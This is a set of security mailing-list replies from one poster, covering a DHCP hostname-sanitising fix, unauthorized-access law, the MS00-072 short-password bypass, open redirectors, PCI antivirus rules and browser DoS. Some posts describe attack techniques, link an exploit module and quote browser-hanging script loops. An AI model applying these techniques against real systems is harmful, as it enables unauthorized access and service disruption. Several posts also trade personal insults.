Leon Kaiser wrote: > I don't see why people are able to directly link to "I'm Feeling Lucky" > Google search results in the first place. Can anyone think of a > practical use for it? Putting a Referer check on "I'm Feeling Lucky" was suggested back in/around September 2007, but as it still works from anywhere, you can see how much Google-oids really take the company's "do not facilitate the less than desirable" to heart... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Search Feature Exploitation Scenario
satyam pujari wrote: > Here is a simple Google's "I'm Feeling Lucky" search feature exploitation > scenario. > [...] Yawn... That's _so_ 2007! http://www.virusbtn.com/resources/spammerscompendium/lucky.xml ...and I seriously doubt that was the first time it was done, just when _I_ happened to make a note of it being actively abused in spam. All that other stuff about free hosting sites and IFrames on blogger.com is unnecessary implementation detail that can be achieved multitudinous ways. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ISC DHCP Client [3.0.x to 4.2.x] Arbitrary Command Execution (CVE-2011-0997)
coderman to Valdis.Kletnieks:
> > Otherwise if a valid dhcp server hands you foo.bar.baz.example.com your
> > hostname
> > just became foobarbazexamplecom - whoops.
>
> a DHCP server should not reply with a FQDN as hostname.
>
> hostname 'foo' at domainname 'bar.baz.example.com' is legit though...
So Valdis' complaint about the "fix:
new_host_name=${new_host_name//[^a-zA-Z0-9]/}
still partly stands.
They should at least have gone with:
new_host_name=${new_host_name//[^-a-zA-Z0-9]/}
as hyphens are valid in host names.
Whether the code should gracefully handle itself in misconfigured
environments, or more, to what extent it should, is ultimately up to
the developers, so they can quibble over the dot character...
Regards,
Nick FitzGerald
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Congratulations Andrew
ghost wrote: > To sum up what full-disclosure has become: > > random arrested and charged with drug possession = 30+ posts > > unreal ircd backdoored = 4? responses. But, most of us immediately understand the issues from the IRCD backdoor, whereas at least the discussion worth reading in the "Congratulations Andrew" thread has actually been on-topic, clarifying common (at least among the ignorati that style themselves "hackers" these days) misunderstandings about what constitutes authorized access _and_ is also (loosley) on-topic for the actual thread as this issue seems likely to be at the heart of any case involving the iPad/AT&T data "leak", in which the person who is the actual subject of the "Congratulations Andrew" thread also seems likely to be involved... So your stats are rather misleading. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Congratulations Andrew
bk to wilder_jeff Wilder: > > By that same standard.. if you leave your house unlocked does > > that give someone the right to enter it? > > > > just my thoughts > > Sending from the right account this time... > > It wasn't an unlocked house. It was a table on the sidewalk with > all the neighbors' Girlscout cookie order sheets on it. Someone > just happened to pickup not only their order sheet, but everyone > else's too. That may be what _you_ see as a relevant analogy, but that's not how most legal systems will see it. To most legal systems it matters not that the folk ostensibly responsible for "protecting" the data effectively just laid it all out (more or less) in public view. The pertinent legal questions will likely revolve around whether the accessor could reasonably claim they did not know they were not authorized to access that data. And how will the courts assess whether the accessor was authorized to access that data? Simple -- they ask the "owner" of the data (AT&T) who will surely say "we did not authorize the defendant to access that data", and they will probably blandly add something like "and we took industry-standard measures to reasonably protect the data against unauthorized access". Whilst the latter is apparently rather easily debunked, doing so is pretty irrelevant to defending an unauthorized access" charge, as regardless of how easily (trivially in this case) the access was obtained, the issue is "was that access authorized". Many apparently stupid things have been built into our computer and technology laws. These often don't actually make much sense if you think the objective of such laws should be to encourage data guardians to do a better job of their charge, but mostly these laws have been made to make it relatively easy to obtain prosecutions. > Think you could get a theft prosecution for that? And touche' to Valdis' response making fun of this part of your post too! Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Congratulations Andrew
T Biehn wrote: > Furthermore if I access an online resource and I notice that the information > ends and the URL has a &page=1 on the end and no link exists on that page to > say... &page=2 is that illegal? IANAL, but I recall a few years back a huge uproar over a case in Germany where the ruling effectively was that what you just described would be considered "illegal access" (or "unauthorized access" or whatever the actual wording of the relevant German law is, translated into English). IIRC, the precise details in that case revolved around the technically simpler act of crawling back up the directory tree exposed by a publicly disclosed URI. That is, the judge (??) ruled that accessing a URI like: http://www.example.com/1/2/ was in breach of whatever law when, in fact, only a URI like: http://www.example.com/1/2/3/ or: http://www.example.com/1/2/foo.htm had ever been explicitly published or provided in an authorized page as a link. Again, as I understand that ruling, it effectively said that accessing any URI that had not been explicitly published as a link was deemed to be unauthorized access. In and/or from Germany, of course... > On the same note, if I notice something that looks like a SELECT statement > in a URL (due to excellent coding) is it illegal for me to modify that > SELECT statement to return other information? To _return_ (that is "only read") other data? That's getting greyer... However, under most jurisdictions with some legal notion of "authorized access" the answer is probably "fairly clearly yes" if you alter such URIs in ways that are likely to alter the contents of the database. The reasoning here goes something like if you have the ability to recognize that that is what those parts of the URI are for, then it is likely to be deemed reasonable that you should also understand the implications of altering those parts of such a URI. If you then issue a request for such a modified URI that you reasonably should have been aware would alter data in whatever database, then you are knowingly altering data that you do not know you have authorization to alter (or, worse, that you know you do not have authorization to alter). > Is the legality of access to the resource something that must be explicitly > granted to me or is it some abstract property depending on the content I've > accessed? Is it legal to randomly fuzz web service arguments without knowing > the data that it will return? Good questions, but in general, in jurisdictions with notions of authorized access, you should be very careful with _other people's_ data, as it is unlikely the courts will have much sympathy for you tweaking anything that is not explicitly "yours", particularly if you appear to be aware that accessing or changing someone else's data that you reasonably should know you were not entitled to access/change in that way was a likely outcome. That is, just because you can doesn't mean you should... > Usually systems of this nature will have an EXPLICIT notice that you cannot > access data on it unless you're authorized OR will require (as it does now) > authentication. AFAIK, most "authorized access" type legislation puts the onus _on the accessor_ to be _sure_ that they have the proper authority for whatever they are doing, and _not_ on the access provider to _prevent_ anything but authorized access. > Did the ICCID count as authentication if it is not explicitly labeled by > AT&T as such? A field like: > &password would clearly be illegal to brute force. > > An analogy to a case with CLEARLY AND EXPLICITLY defined law regarding > private property doesn't really seem to fit. Sorry -- don't know what US (and even possibly which state) legislation would cover this case. Presumably some ugly intersection of federal laws and those of the the states where the perpetrator(s) resided (and/or obtained access from), the state(s) where the accessed AT&T server(s) were, perhaps even the state where AT&T is incorporated and/or has its head office, and perhaps even the state(s) where the network access services, proxy devices, etc used by the perpetrators were? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secunia Research: Microsoft Excel Record Parsing Input Validation Vulnerability
Paul Heinlein wrote: > > 04/12/2009 - Vendor notified. > > 04/12/2009 - Vendor response. > > 11/01/2010 - Status update requested. > > 12/01/2010 - Vendor provides status update. > > 30/03/2010 - Vendor provides status update. > > 27/04/2010 - Vendor provides status update. > > 26/05/2010 - Vendor provides status update. > > 08/06/2010 - Public disclosure. > > 15.75 months to respond to a critical vulnerability in one of the most > widely used business applications the world has seen? w00t. U -- your US-centric view of dates is showing rather obviously, unless you can explain the unexpected appearance of a 27th month this year -- one that, even more oddly, cam after the 30th month and before the 26th, which itself came before the 8th month which itself has come before we've reached the middle of the June, the 6th month... Or maybe your US-centric view of dates coupled with your loathing of MS blinded you to your date inadequacies? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] What are the basic vulnerabilities of a software?
rajendra prasad wrote: > Hi List, > I am preparing a list of main and basic vulnerabilities in software. Please > let me know If you know other than the below list. Why yes, I do... > List of Basic Vulnerabilities: > 1. Buffer Overflow: Stack, Heap. > 2. Format String Vulnerabilities > 3. SQL Injections > 4. XSS Vulnerabilities Cheating on a homework assignment? Arguably only one of the above is a basic vulnerability (and even that is probably debatable) -- the other three are just examples of one or other basic types (and two of them are probably examples of the same basic type). Try to get hold of the RISOS Project report(s) or sources that summarize that work. Any good, basic CompSec textbook should cover this stuff, BUT there is more than one widely referenced comprehensive categorization of basic security errors, so you should probably check around a bit... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] adobe pdf file format
rajendra prasad wrote: > I am trying to understand the latest pdf file format vulnerabilities. But i > didnt get complete pdf file format. I got a brief introduction document > written by Dr. Edgar Huckert ref: http://www.huckert.com/ehuckert/pdfart.pdf. > Please help me in this regard. Did you even _try_ Google? http://www.google.com/search?q=pdf+file+format has the Wikepedia entry about the file format in first place (and includes links to the current version of Adobe's "official" documentation of the format and other useful resources), and has the "Adobe PDF Developer Center: PDF reference" page as the second result. Given your inability do such basic Google searches that would find you exactly the answer you want, it seems a waste of effort to add links to other useful information, generator code that makes "interesting" PDFs, and the like, so I won't... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] JavaScript exploits via source code disclosure
Christian Sciberras wrote:
> This is a seriously flawed argument.
Correct...
> JS == plain text. Full Stop.
...but that has nothing to do with the reasons why.
First, because it is simply wrong (FSVO "plain text").
For just one trivial example, the following Javascript doesn't look
anything like anything normally considered "plain text":
http://cecil.auckland.ac.nz/scripts/menu.js
yet it runs as designed (and there's no need for anyone to provide an
explanation of what it is, what it does, how it works, etc).
In the contexts in which Javascript is typically relevant, and
specifically in this case, the colloquial "plain text" is generally
expected to be material that can be safely transferred across the
internet under text/plain character encoding. While the above example
may survive that on a binary-clean transport (like HTTP) it just might
not on other common internet protocol transports.
And, FWIW, the ECMAScript standard says, in the first sentence of
Section 6 ("Source Text"):
ECMAScript source text is represented as a sequence of characters
in the Unicode character encoding, version 3.0 or later.
Again, close-minded as it is, Unicode and "plain text" typically do NOT
mean the same thing on the Internet (an oversight that will probably be
"fixed" within another generation or so).
I think you confused "plain text" with "necessarily scrutable", or
similar.
Regards,
Nick FitzGerald
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] JavaScript exploits via source code disclosure
Ed Carp wrote: > We've got a lot of JQuery code that calls back-end web services, and > we're worried about exposing the web services to the outside world - > anyone can "view source" and see exactly how we're calling our web > services. > > Are there any suggestions or guidelines regarding protecting one's > source from such disclosure? Thanks in advance! If the details have to be in the JS (really?) then accept that they have to be exposed to all and sundry and design to that constraint (which may mean deciding that you really don't want to drink the web 2.0 Kool-Aid after all...). There are all manner of weaselly described/advertised code "encryptors" and such, which are really just obfuscators. If the code has to run in the (JS interpreter of the) client browser, it is necessarily available to any marginally competent "attacker" (or even me). Anyone motivated enough (and that will not have to be terribly motivated) will be able to untangle the results of such and then try to make sense of the remaining representation of your code. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] newest category of security bugs considered elite ?
Dan Kaminsky to me to him: > >> I really like the hash length declaration bugs, where the client can > >> tell the server how many bytes of a hash need to be validated. (Yep, > >> you just say "one byte is plenty") > >> > >> SNMPv3 and XML-DSIG both fell to this, catastrophically. > > > > I thought Georgi asked for the newest class of elite vulns? > > > > Does (at least) ten years old count as new? > > > Ooh, SMB's old Hollywood OS bug -- one character at a time attacks. Well, you could use it for char-at-a-time extraction of the actual password, if that was what you wanted (and utilities to do just that were written based on the original PoC code for the vuln -- see URL below for that POC code), BUT you could simply say (as the client) "here is the one char password" and, so long as it matched the first char of the actual server-side view of the correct password, you were given access to the resource, reducing the difficulty of gaining access to something like a 36 char (maybe plus a few punctuation chars?) space and thus 18 (or a few more) attempts on average (or were these passwords case-senstive? Doesn't seem likely for non-NT Windows...). I don't recall now if you could just say "here is the zero char password" -- I have an idea I saw that claim made but was not able to reproduce it in my tests... The advisory from the original (well, credited) discoverers tends to support this explanation (moved from its original URL, which is widely broken-linked around the web): http://www.nsfocus.com/en/advisories/0005.html <> > This bug class is different, and as far as I know unseen from the 80's > and 90's. In this one, you tell the remote system, 'sure, I can match > your stored hash -- but it's only one byte long.'. So you try an > average of 128 passwords, and off you go. Sounds just like the above if your only concern was breaking access to the specific resource, rather than recovering the actual password (the massive speeding up of which was a handy side-effect of the actual MS00- 072 bug). > It's basically a problem where the client is trusted to provide > excessive metadata about server state. ... As I said, that sounds just like the real problem at the core of MS00- 072. The client tells the server how long of a password it is going to supply and instead of the server failing the supplied password because it's too short (relative to the configured one) it accepts it so long as it matches the configured password up to the client-specified length... You're talking about hashes and MS00-072 is about cleartext passwords, but I don't see that that is relevant to the class of vuln here. > ... If you've got other examples in > this family, it'd be cool to hear them. This is the only one that immediately comes to mind... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] newest category of security bugs considered elite ?
Dan Kaminsky wrote: > I really like the hash length declaration bugs, where the client can > tell the server how many bytes of a hash need to be validated. (Yep, > you just say "one byte is plenty") > > SNMPv3 and XML-DSIG both fell to this, catastrophically. I thought Georgi asked for the newest class of elite vulns? Does (at least) ten years old count as new? http://www.microsoft.com/technet/security/bulletin/ms00-072.mspx And against Win9x count as elite? 8-) FWIW, MS00-072 was fairly widely exploited in the wild by at least the Opaserv (aka Opasoft) family of worms, though not until a couple (?) of years after the bulletin's release. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Tracy Reed to me: > > Anyone authoritatively stating that antivirus software is a necessary > > component of a "reasonably secure" system is a fool. > > No, they just think all the world is Windows. My comments were, and still are, OS agnostic. It matters not what the OS -- anyone authoritatively stating that antivirus software is a necessary component of a "reasonably secure" system is a fool. Ditto my second comment... > > So _if_, as you and another recent poster strongly imply, the PCI > > standards include a specific _requirement_ for antivirus software, then > > the standards themselves are total nonsense... > > PCI only requires antivirus for systems commonly affected by > viruses. ... Then, as I said, the PCI requirements are total nonsense... > ... This means Windows. PCI security council has said that UN*X > OSs etc. are not required to have antivirus. So what system and application integrity requirements do they require for those OSes (presumably "instead of antivirus")? Your response strengthens my belief that PCI is dangerous because it enshrines small-minded ignorance as "best practice" (or, at least, as "minimally acceptable practice") without recognizing the possibility that there may be better options that have not been so, ummm "over sold" as to become perceived as necessary. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Shaqe Wan wrote: <> > Because it shall be nonsense to deal with CC, and not have an Anti-virus for > example !! Well, you see, _that_ is abject nonsense on its face. Do you have any understanding of one of the most basic of security issues -- default allow vs. default deny? There are many more secure ways to run systems _without_ antivirus software. Anyone authoritatively stating that antivirus software is a necessary component of a "reasonably secure" system is a fool. Anyone authoritatively stating that antivirus software is a necessary component of a "sufficiently secure" system is one (or more) of; a fool, a person with an unusually low standard of system security, or a shill for an antivirus producer. So _if_, as you and another recent poster strongly imply, the PCI standards include a specific _requirement_ for antivirus software, then the standards themselves are total nonsense... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Tracy Reed to Digital X: > > Having just gone through a PCI audit I can safely say a few things: > > Not the fault of PCI. Perhaps you should consider a better auditor. Um -- isn't the point that PCI is set up such that lowest (common denominator amongst) auditors are actually the ones that define what "PCI compliance" really is? As an earlier poster already pointed out, all the vaguely recent major credit card data theft cases have involved "fully PCI compliant" (as defined by that perpetrator's PCI auditors) card processors, etc... What part of "that's really fsck'ed-up" did you not understand? ... Sure, you _can_ retain a "morally [and maybe even technically] superior" PCI auditor, but WTF does that buy you other than a bigger bill for an essentially meaningless "certification"? Did any of those massive "PCI accredited" fsck-up operators lose their accreditations? Did any of them have to give up there CC processing business activities as a result of their _proven_ (by the mostly generally trivial "hacks" that fsck'ed them up) poor practice? So Why would any other "must be PCI compliant" operators even consider spending more money than the lowliest of PCI auditors charge? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
I've resisted getting involved in this and suspect that this may be a misguided attempt to clarify (??) a few things, but... Bipin Gautam wrote: > Before: "From the prosecutor's perspective, everything your hard drive is > yours" > > I just proved : everything your hard drive is NOT NECESSARILY YOURS. This need not matter. In several (many, most and increasing) Western jurisdictions _just possessing_ certain kinds of material is a criminal offense. This is typically child pornography and/or beastiality but often includes other more or less specific things. For example, writing as I am from New Zealand right now, I would almost certainly be committing an indecency offense by including the words "golden" and "shower" run together into a single phrase in this Email. Within such jurisdictions, the issue of "knowledgable possession" or "intent to possess" are technically irrelevant to the issue of "did you breach this law", for as written, the offence is "possession" (and/or production, etc, etc) with no elaboration. > DOES THAT CHANGE ANYTHING? LOGIC MAYBE??? I guess to assess that, we have to first decide whether you know what you're talking about or not... And have you not heard of "the Trojan Horse defense"? Kinda the legal opposite of "the dog ate my homework" and already successfully used a few times. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Surge in Skype Spam activity
dramacrat wrote: > h, shall I click a tinyurl coming from a f-d poster? > > n/n, pick one > > this is email, not twitter. if you're sharing a legitimate link, there's no > reason not to directly link to it. Whilst I agree entirely with these sentiments, at least tinyurl has a (I thought well-known) "preview" option that does not require a browser plugin -- simply prefix the tinyurl.com domain name with the "preview" sub-domain and instead of auto-redirecting you tinyurl will tell you the redirection URL. Also, is using a commandline URL grabber like curl or wget to see the 301 redirect terget really that difficult for a 1337 F-D hax0r such as yourself? FWIW, the target URL is: http://securityextension.com/securitylab which really doesn't seem worth the effort of shortening... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Chrome 3.0.195.33 leaks DNS data queries outsitde of proxy if dns pre-fetching is enabled
Christian Sciberras to me: > "Disagreements, flames, arguments, and off-topic discussion should be > taken off-list wherever possible." > I wonder where I've read that... So, knowing that, you decided to post your deeply security-illuminating "Seriously, I didn't subscribe for this list just to get personal attacks" comment, _to the list_? You're clearly a bigger moron than your initial comment suggests! Thanks for pointing that out to us... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Chrome 3.0.195.33 leaks DNS data queries outsitde of proxy if dns pre-fetching is enabled
Christian Sciberras wrote: > Seriously, I didn't subscribe for this list just to get personal attacks. You're on the wrong list then... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] UK jails schizophrenic for refusal to decrypt files
Stephen Mullins wrote: <<...>> > Britain is a lost nation from the human rights perspective. Luckily, > their problems are not our problems, yet. First, I'm neither British nor based in the UK, despite my Email address and this is not a defense of the UK position, which sucks. You say "our" -- you mean the USA?? If so, then you are really behind on your reading. The US has almost exactly the same laws in place thanks to some of the weasel words in the Patriot Act and its friends. I'm continually surprised how ignorant of this so many US folk are. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New Paper: MitM Attacks against the chipTAN comfort Online Banking System
Thierry Zoller wrote: <> > For sake of allowing proper risk assessment by technically less > trained persons - one should coin a better term than classical mitm - > but maybe I am mistaken? what about MITMa (man in the machine) In my experience, "Man in the Browser" (or MitB) is the phrase that this is commonly known as in the anti-malware and phishing communities (regardless that some of the components involved are not "in the browser", per se, at all). Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question about police harassment. Police trying over years to "entrap" me as hacker.
TheLearner wrote: <> > What would you do? I'm not sure what _I_ would do facing such a crisis, but I think the best thing for _you_ to do is hire n3td3v and Gary McKinnon's lawyer (s/he has been posting to this list lately, so should be easy to track down), and then get those two uber hackers to help as well -- they'll be much more help _to you_ than any private eye ever will... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TPTI-09-03: Apple iTunes Multiple Protocol Handler Buffer Overflow Vulnerabilities
Thierry Zoller to Will Drewry: > WD> Here's the (mac) exploit module to go along with my simul-report to > WD> apple: http://static.dataspill.org/releases/itunes/itms_overflow.rb > > OMFG, you must by kidding, are we 1999 again ?? Classical Stack buffer > overflow in URL request ?! ..o m f g =) Nice find! You must be wrong! It's a well-known fact -- just ask any Apple fanboi -- that Macs are invulnerable to security exploits of any kind because they are based on Unix-ish and/or open source code and/or are developed by far cooler _and_ cleverer dudes than anyone who ever worked at MS (or anywhere else for that matter, except NeXT) and/or because Steve (the sun shines out my orifices) Jobs said so... So, now we've established that you are wrong, HTF can anyone at Apple seriously claim their shit is worth bottling given they keep getting caught with such egregiously crappy bugs in their code? And how is it that folk who really should know better keep feeding this line of BS? Oh, that's right, they need to justify the grossly excessive cost of those non-Windows x86 machines they've been buying the last few years... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] nVidia.com [Url Redirection flaw]
Pete Licoln saw fit to write: > There's a difference between an xss and an url redirection .. > this post was about an url js based redirection, now it's a Xss, to me > that's a lot of talk ( and i do contribute ) for an no persistant xss , > ... We've seen weirder things used in phish and other scams... Remember, open redirectors allow remote "brand reputation transfer" (aka theft) for whatever purpose may suit a third a party. Web app devs and admins who do not inherently understand that (some 80+% by my estimates) should not be allowed near any servers on the public Internet. (That would put Doubleclick, and thereby much of Google, well out of business.) I can imagine ways the "fake codec" folk could _very_ conveniently use this to boost their install rates. (If I have to spell this out to anyone here, they're on the wrong list...) ... Now Valdis -- what odds will you give for nVidia fixing this before we see it being roundly abused? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] nVidia.com [Url Redirection flaw]
Rubén Camarero wrote: > What great references. Owasp isn't the king of vulnerability information, of > course a website named XSSed is going to count this as super serious, and > while I respect Insecure.. these days, people have exploited web bugs to > their max (and I'm waiting for more), but they aren't directly serious. > DIRECTLY is the key word. No, but just because this kind of vulnerability is "only" indirectly serious dosen't mean that they aren't serious. Just because _you_ are too dim to imagine a way that someone can profit significantly from exploiting this does not mean that there are not such methods, NOR that use of such exploits won't "damage" nVidia. Whether nVidia (and others affected by so many similar vulnerabilities) will see this and decide to take action is what really matters. In this regard, I certainly hope that you do not work for, or consult with, or otherwise represent the view of nVidia on this issue. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google to base ads on surfing behaviour
ty-related issue to this thread, I'd rather that Google and DoubleClick spent some time and effort on fixing a couple of DoubleClick's biggest problems rather than on adding AdSense tracking integration to DoubleClick's cookie mechanisms. First is that DoubleClick really needs to work on not accepting "dodgy" ads such as the "fake AV" ads and such they've been serving increasingly often of late. Second, and much bigger, DoubleClick also needs to fix a huge security flaw across the whole of doubleclick.com. doubleclick.com is an open redirector farm. Depending on your school of thought, that might be considered what is known in web app security circles as a form of cross- site scripting (or XSS) flaw. This has been abused by spammers, phishers and malware spreaders in the past and fixing it won't be trivial as the whole DoubleClick business model is based on this behaviour and the common, Q&D fix for this type of problem (referer-checking based solutions) is unviable when the expected referrers are virtually any domain on the planet (as required by DoubleClick's distributed ad serving business model). It took Google the best part of a decade to (mostly) fix its own open redirector problems, but that should mean it can provide some valuable input to its new stablemate... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apple Safari ... DoS Vulnerability
Chris Evans to me: > By this definition of yours, DoS is fundamentally built in to browsers > (by way of simply following specifications) -- even those with decent > privsep models. Not necessarily... Factually, probably so but that says more about our s/w development methods and what has (historically) passed as "acceptable" in that arena. Browsers could reasonably implement various kinds of resource expenditure limitations, but few, if any, do OOTB (FF 2.x I think added some basic "this script is taking too long" controls, but there is a lot more that could be done). Is that specification antagonistic? Arguably yes because the specifications don't say "... to N levels of recursion" and such. But maybe that tells us an awful lot about the specifications and the culture of the folk who wrote them? Yep -- they came from that "she'll be right" s/w dev background that is responsible for most of the crap that means we're assured of jobs for life (well, if you're as old as me anyway!). > Web security IS fundamentally broken at the foundations, so I'm not > going to disagree with you. 8-) > It raises the question: DoS is an overloaded term, ... DoS is not an overloaded term -- it means pretty much what it says, as Thierry pointed out. Yes, a lot of noobs and journalists confuse it with _D_DoS and its usual, deliberate "with malicious intent" connotation, but that might just be an education problem... > ... perhaps it should > be reserved for cases that actually have real-world significance? Or > is a new term required? How do we operationally define "real-world significance"? That was my original point -- this is a DoS Whether it's "worthy" of discussion here or not is a different issue that touches precisely on the issue of defining "real-world significance". There may be some subtle use for such a vuln that allows it to be combined with one or more other "minor" vulns to make for a modestly worrying attack, or there may not. Until that is found (probably by a Black Hat because White Hats are so quick to dismiss things like this with "it's only a trivial browser tab-closing DoS" and move on to sexier sounding bugs) this may be ignored because no-one deems it "worthy", extending the long, sad history of quality neglect in s/w development. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apple Safari ... DoS Vulnerability
Chris Evans to me: > So, you have injected HTML into stupid.com, and you choose to inflict > the fury of a closing tab upon hapless visitors? Your point? I said nothing about how big or bad of a vulnerability it is, just that it is one. Are there lots and lots of trivial vulns in software? Yes. Do we reliably know which ones are safe to ignore? Not if history is any vague kind of guide... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apple Safari ... DoS Vulnerability
Michal Zalewski to me:
> > But what if www.evil.com has run an injection attack of some kind (SQL,
> > XSS in blog comments, etc, etc) against www.stupid.com?
> >
> > Visitors to stupid.com then suffer a DoS...
>
> In such a case, the attacker may just as well clobber body.innerHTML,
> run a while (1) loop, or otherwise logically deny or alter service to
> visitors without actually exploiting any specific bug ...
So?
> ... - so I do not
> see any significant benefit to killing this particular tab.
Where in any usable definition of "denial of service" does the word
"useful" or concept of "benefit" appear?
The question was, is it a DoS.
It is.
> Crashing / hanging the entire browser is somewhat different, as it
> bears some risk of data loss in plausible usage scenarios.
> Unfortunately, most implementations do very little to prevent cases
> that were permitted by standards in the first place (things such as
> "while (1) str += str", "while (1) alert('foo')", looped blocking
> XMLHttpRequest calls, ridiculously nested XML and other
> expensive-to-render content, etc) - which makes finding new instances
> somewhat futile and pointless, and a result, somewhat frowned upon on
> security mailing lists (ugh).
I agree, but I was not addressing that.
Is it useful? Probably not.
But it's still a DoS...
And, will the Safari folk find something more important to fix if/when
they look into it?
Who knows but it won't hurt for them to look...
Regards,
Nick FitzGerald
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apple Safari ... DoS Vulnerability
bobby.mug...@hushmail.com wrote: > Dear Nick, > > You and Thierry Loller are wrong. Thank-you for your comprehensive and compelling argument. Applying your debating technique, I now see that you are a dick-wad. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apple Safari ... DoS Vulnerability
